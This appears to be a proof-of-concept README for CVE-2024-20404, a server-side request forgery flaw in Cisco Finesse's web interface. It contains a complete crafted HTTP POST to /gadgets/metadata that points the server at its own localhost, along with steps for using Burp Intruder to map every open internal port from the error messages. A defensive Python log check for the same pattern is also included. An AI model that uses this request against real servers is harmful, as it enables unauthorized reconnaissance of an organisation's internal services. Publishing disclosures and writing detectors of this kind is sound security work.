PoC details: 0e83cf1f06363fa0801280a548aded51e65ae9dc

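Related vulnerability
Title: Cisco Finesse code issue vulnerability (CVE-2024-20404)
Description: Cisco Finesse is call center management software from Cisco (USA). Cisco Finesse has a code issue vulnerability caused by insufficient validation of user input in specific HTTP requests sent to an affected system.
Introduction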
## Description

A vulnerability in the web-based management interface of Cisco Finesse could allow an unauthenticated, remote attacker to conduct an SSRF attack on an affected system.

This vulnerability is due to insufficient validation of user-supplied input for specific HTTP requests that are sent to an affected system. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to obtain limited sensitive information for services that are associated with the affected device.



## Proof of Concept (PoC)

1. Replace `<target>` with your own target, then send the request below to check the response from port "8444" on the server's localhost.

```HTTP
POST /gadgets/metadata HTTP/2
Host: <target>:8445
Cookie: timeBeforeFailover=1695808242310; timeBeforeAttemptingLoginInIframe=1695808244317; attemptsMade=1; seqNumberGenerated=1; finesse_ag_extension=<extension>; activeDeviceId4000=SEPD4AD717A03F6; timeBeforeLoadingOtherSide=1695808249678
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<target>:8445/desktop/container;jsessionid=90aE172355707490406528141464742B/?locale=en_US
Content-Type: application/json
Content-Length: 127
Origin: https://<target>:8445
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"context":{"container":"default","language":"en","country":"US","locale":"en_US"},"gadgets":[{"url":"http://127.0.0.1:8444"}]}
```

![](screenshots/Pasted%20image%2020240609205940.png)

2. Use Burp Suite Intruder to scan all the open ports on the Cisco Finesse web-based management server by changing the port number from 1 to 65535.

3. You will see the response "Connection refused" on the closed ports.

![](screenshots/Pasted%20image%2020240609210322.png)

4. Any other error message indicates that the port is open, so the open ports can be enumerated.

![](screenshots/Pasted%20image%2020240609210501.png)
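
A defender-side check for the pattern in the steps above, as an added example that is not part of the original README: it flags `/gadgets/metadata` request bodies whose gadget URL targets a loopback or private address and reports clients that request many distinct internal ports. The log record shape, the sample data and the `port_threshold` value are assumptions.

```python
import ipaddress
import json
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample records (client IP, path, JSON body), shaped like what a
# body-logging reverse proxy in front of Finesse might capture (assumption).
SAMPLE_REQUESTS = [
    ("198.51.100.7", "/gadgets/metadata",
     '{"gadgets":[{"url":"http://127.0.0.1:%d"}]}' % port)
    for port in range(8440, 8446)
] + [
    ("203.0.113.9", "/gadgets/metadata",
     '{"gadgets":[{"url":"https://gadgets.example.com/team.xml"}]}'),
    ("203.0.113.9", "/desktop/container", "{}"),
]

def is_internal(host):
    """True for localhost and loopback, private, link-local or unspecified IPs."""
    if not host:
        return False
    if host.lower() == "localhost":
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # other hostnames would need DNS resolution; not done here
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified

def internal_targets(body):
    """Return (host, port) for each gadget URL that targets an internal address."""
    hits = []
    try:
        gadgets = json.loads(body).get("gadgets", [])
        for gadget in gadgets if isinstance(gadgets, list) else []:
            parts = urlsplit(gadget.get("url", ""))
            port = parts.port or {"http": 80, "https": 443}.get(parts.scheme, 0)
            if is_internal(parts.hostname):
                hits.append((parts.hostname, port))
    except (ValueError, AttributeError, TypeError):
        pass  # malformed JSON or URL: keep whatever was collected so far
    return hits

def scan_report(requests, port_threshold=5):
    """Map client IP -> sorted internal ports requested, for clients at/above threshold."""
    ports = defaultdict(set)
    for client, path, body in requests:
        if path.split("?")[0] == "/gadgets/metadata":
            ports[client].update(port for _, port in internal_targets(body))
    return {c: sorted(p) for c, p in ports.items() if len(p) >= port_threshold}
```

The same `is_internal` test can back an allowlist in front of the endpoint, rejecting gadget URLs that point at internal addresses before they reach the server.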



## References

- [https://nvd.nist.gov/vuln/detail/CVE-2024-20404](https://nvd.nist.gov/vuln/detail/CVE-2024-20404)
- [https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-finesse-ssrf-rfi-Um7wT8Ew](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-finesse-ssrf-rfi-Um7wT8Ew)



## Disclaimer

This is just a Proof of Concept (PoC) to demonstrate that the Cisco Finesse web-based management interface is vulnerable to Server Side Request Forgery (SSRF), and this PoC is for educational purposes only. Use it responsibly and only on systems with explicit permission to test. Misuse of this PoC can result in severe consequences.
File snapshot

```
[4.0K] /data/pocs/0e83cf1f06363fa0801280a548aded51e65ae9dc
├── [2.8K] README.md
└── [4.0K] screenshots
    ├── [ 43K] Pasted image 20240609205940.png
    ├── [358K] Pasted image 20240609210322.png
    └── [389K] Pasted image 20240609210501.png

1 directory, 4 files
```